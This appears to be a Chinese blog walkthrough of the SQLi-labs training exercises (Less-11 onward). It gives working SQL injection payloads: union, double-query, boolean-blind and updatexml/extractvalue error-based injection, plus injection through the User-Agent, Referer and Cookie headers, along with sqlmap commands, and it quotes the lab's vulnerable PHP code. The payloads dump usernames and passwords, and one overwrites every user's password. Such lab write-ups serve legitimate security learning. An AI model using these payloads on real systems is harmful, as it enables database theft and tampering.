人生就是一场赌博,怕输的人永远赢不了。
1.开始为post类型的注入,先加个单引号,报错如下。
构造出SQL语句应该为:select username,password from users where username=' ' ' and password=' 2' limit 0,1;
也即是password字段被单引号包含了' and password='
,导致 出现2' limit 0,1;
引号不匹配的情况。下图看起来更直观些。
2.所以,可构造如下语句:' #
。 #
把后面的都注释掉,然后在其前面加上自己构造的语句。
3.先用group by 看看有多少列:' group by 1
,经过测试,共2个字段。
4.下面,开始使用联合查询:-1' union select 1,2 #
返回正常,开始构造语句。
5.查数据库名:' union select 1,database() #
6.接下来查表名,构造和Less-1
类似:' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #
7.查列名' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
8.查内容:' union select group_concat(username),group_concat(password) from security.users #
OK,已经得到想要的。
1.首先,使用BurpSuite
抓包,然后保存抓取到的内容。例如:保存为use.txt,把它放至某个目录下,这里为:F:/temp/use.txt
。
2.首先,判断是否存在SQL注入漏洞,python2 sqlmap.py -r F:/temp/use.txt - --batch
得到两个注入点,如图:
3.查询当前数据库python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db
4.查询表::python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables
5.剩下的查询和Less-1
的用法一样,列-内容,一个一个爆即可。
1.加单引号,正常,加双引号,报错:
由图可知,为双引号加括号闭合。
2.构造:") #
返回正常,所以用Less-11
构造的方法构造语句即可。即") 构造的语句 #
不在赘述。
1.加单引号,报错,知道为单引号加括号闭合。
2.以为就这样了,结果采用上面的构造方法无用,看来没那么简单,应该使用双查询注入了,和Less-5的构造基本相同。
3.查数据库,构造如下。') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
继续爆其他数据库名,改变limit n,1
即可。
4.查表:') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
同样,改变limit n,1
即可。
5.查列名:') or (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #
同样,改变limit n,1
即可。
6.查内容:') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
同样,改变limit n,1
即可。
1.加单引号,正常,加双引号,报错,可知为双引号闭合。
2.应该不会直接是联合查询了,一试,果然还是双查询注入。
3.构造:" 构造语句 #
构造语句和less-13
一样。
1.加单引号,只有“报错”,应该是要盲注,而且只能布尔型或时间型了(只知道错了没压根不知道错的信息)
2.不管,先把注入句式试出来,用万能句型' or 1=1 or '1'='2
,经过尝试,为单引号闭合,此时登录成功。
3.开始布尔型盲注:构造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2
,其实就是把上面的1=1
改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))
为true。
4.继续构造:都是把构造好的语句替换1=1
,从而查看结果。构造和Less-6
差不多,不再赘述。
1.还是用万能句型试,最终试出为双引号加括号闭合,即使用") or 1=1 or "1"=("2
登录成功。
2.接下来的构造和Less-15
一样,如") or 1=(if(substr(version(),1,1)=5,1,0)) or '1'=("2
。
1.进入页面提示为PASSWORD RESET,即重置密码界面,坑比较多。
2.首先,在user name
中尝试了多次,都是让走开,后来一想,确实该走,都提示为重置密码了,还傻傻地在user name
试,应该在new password
中想办法。后来看了其他大佬的博客后,查看源码才知道原来对user name
表单进行了过滤:
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { //making sure uname is not injectable $uname=check_input($_POST['uname']); $passwd=$_POST['passwd'];
function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,15); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value;
函数check_input()
的作用就是检查用户输入,并将用户输入安全化,其中的mysql_real_escape_string()
会在\x00, \n, \r, \, ', " and \x1a
这些字符前加入反斜线进行转义,防止注入,而且这个函数也避免了宽字节注入的危险。
3.当然,还不止,new password
也不是和之前一样轻易试出注入类型,因为有user name
的限制,如果new password
不对,那么怎么试都自然是错的。因为看了大佬的解题思路,知道了为单引号闭合,SQL语句为:@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
且知道有用户名为admin
(这个用户名一般都有)。所以就直接考虑构造了。
4.首先考虑到不能回显有意义的信息,所以首选前面一直用的双注入查询 构造如下:user name:
填admin
,而new password:
填' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
剩下的构造不多说,和Less-13
一样,一个一个爆就好。
5.在这里,尝试使用一种新的注入方法,基于extractvalue()
和updatexml()
的报错注入,详情请看: 学习基于extractvalue()和updatexml()的报错注入,同时,下面的注入丢默认user name:
填admin
6.先使用updatexml()
进行注入,构造为' and updatexml(1,concat('~',(select version())),1)#
获取相应版本:
获取数据库名称:' and updatexml(1,concat('~',(select database())),1)#
获取表名:' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)#
改变limit n,1
即可获取其他表名。
获取列名:' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)#
同样,改变limit n,1
即可。
获取内容:这样,不行' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)#
报错如下:
这样:也不行' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)#
报错如下:
这样:发现可以了,但是password
成了0,一下子把所有的用户密码都改成了0,后面的可能就有问题了。' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
7.使用extractvalue()
,和updatexml()
十分相似,用法也差不多,甚至看起来跟直观些。构造:' and extractvalue(1,concat('~',(select version())))#
剩下的语句和updatexml()
的类似。
1.进入后显示Your IP ADDRESS is: ::1
,输入常用的注入尝试,都只显示:
看来和上一题一样,都进行了相关的过滤。
2.实在不懂,先看一下源码:
if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']);
这次对两个表单都进行过滤了。
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; $result1 = mysql_query($sql); $row1 = mysql_fetch_array($result1); if($row1) { echo '<font color="#FFFF00" font="" size="3">'; $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert); //echo 'Your IP ADDRESS is: ' .$IP; echo "</font>"; //echo "<br>"; echo '<font color="#0000ff" font="" size="3">'; echo 'Your User Agent is: ' .$uagent; echo "</font>"; echo "<br>"; print_r(mysql_error()); echo "<br><br>"; echo '<img src="../images/flag.jpg">'; echo "<br>"; } else { echo '<font color="#0000ff" font="" size="3">'; //echo "Try again looser"; print_r(mysql_error()); echo "<br>"; echo "<br>"; echo '<img src="../images/slap.jpg">'; echo "</font>"; }
看到只有用户再登陆成功后才会显示用户的user agent
,并且将uagent
, ip_address
, username
插入到了uagents
表中。查看一下:
注意到:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
在插入过程中并没有进行过滤,由此可知,可以从uagent
下手。本来ip_address
也可以成功的,但是源码中显示被注释掉了,回显的只能是用户的user agent
3.构造uagent
的内容,使用BurpSuite
对提交内容进行抓包,然后再修改相应的User-Agent:
4.易知,只要保证User-Agent:
字段内容,即uagent
保持单引号闭合,且使用双查询注入或使用extractvalue()
或updatexml()
构造相应语句即可(因为是在插入语句中,只能通过报错获取我们想要的信息)。
5.构造语句查询数据库名:
构造一:' and updatexml(1,concat('~',(select database())),1) and '1'='1
构造二:' and extractvalue(1,concat('~',(select database()))) and '1'='1
构造三:' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1
6.其他构造和之前的相似,不再赘述。
admin
的进行尝试,发现:2.也就是说我们需要将构造语句放入Referer:
尝试:' and extractvalue(1,concat('~',(select database()))) and '1'='1
成功,知道方法就好了。
1.提示为Cookie,直接用我们知道的用户名密码都为:admin
的进行尝试,发现:
2.Cookie
为:uname = admin
所以构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #
3.构造还是一样的。
目前就先到这吧,这部分的题目都是post类型的,后面好像还有,但还是放下一篇吧。当然,文中如有错误或其他更好的语句或解法,还希望诸位不吝赐教,多谢。
- 学习基于extractvalue()和updatexml()的报错注入
- SQL注入新手教程(讲的很好的内容,之前没发现,现在才看到)
- It is not safe to rely on the the system's timezone settings解决方法